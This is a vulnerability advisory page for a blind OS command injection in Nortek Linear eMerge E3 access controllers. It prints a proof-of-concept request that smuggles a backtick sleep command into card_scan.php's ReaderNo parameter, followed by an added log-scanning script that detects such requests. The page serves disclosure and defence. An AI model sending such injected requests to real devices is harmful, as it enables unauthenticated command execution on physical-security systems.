CVE-2022-31499: Nortek Linear eMerge E3-Series Command Injection ≈ Packet Storm
Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256.
# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499
# POC:
====================
http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep20`&CardFormatNo=1337
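A log-review check for the request shown above, added here as an example and not part of the original advisory or the vendor's code: it flags card_scan.php requests whose No, ReaderNo or CardFormatNo value is not a plain integer. It assumes the web server writes combined-format access logs and that these parameters are numeric in normal use (inferred from the 1337 values in the request above); the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters seen in the advisory's request. Assumption: legitimate values are integers.
NUMERIC_PARAMS = ("No", "ReaderNo", "CardFormatNo")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
PLAIN_INT = re.compile(r"[0-9]{1,10}")

def suspicious_params(request_target):
    """Return card_scan.php parameters whose decoded value is not a plain integer."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/card_scan.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = []
    for name in NUMERIC_PARAMS:
        # parse_qs percent-decodes, so encoded shell metacharacters are caught too.
        if any(not PLAIN_INT.fullmatch(v) for v in query.get(name, [])):
            bad.append(name)
    return bad

def scan_log(lines):
    """Return (line_number, [parameter names]) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_params(match.group(1))
            if bad:
                hits.append((number, bad))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] '
    '"GET /card_scan.php?No=12&ReaderNo=1&CardFormatNo=3 HTTP/1.1" 200 15',
    '192.0.2.77 - - [01/Jan/2023:10:00:05 +0000] '
    '"GET /card_scan.php?No=1337&ReaderNo=%60sleep20%60&CardFormatNo=1337 HTTP/1.1" 200 15',
    '192.0.2.10 - - [01/Jan/2023:10:00:09 +0000] '
    '"GET /index.php?ReaderNo=abc HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG):
        print(f"line {number}: non-numeric value in {', '.join(names)}")
```

Because the injection is blind, the response body and status code look normal; the request parameters themselves are the signal worth alerting on.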
Related news
Nortek Linear eMerge E3-Series Command Injection
Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability.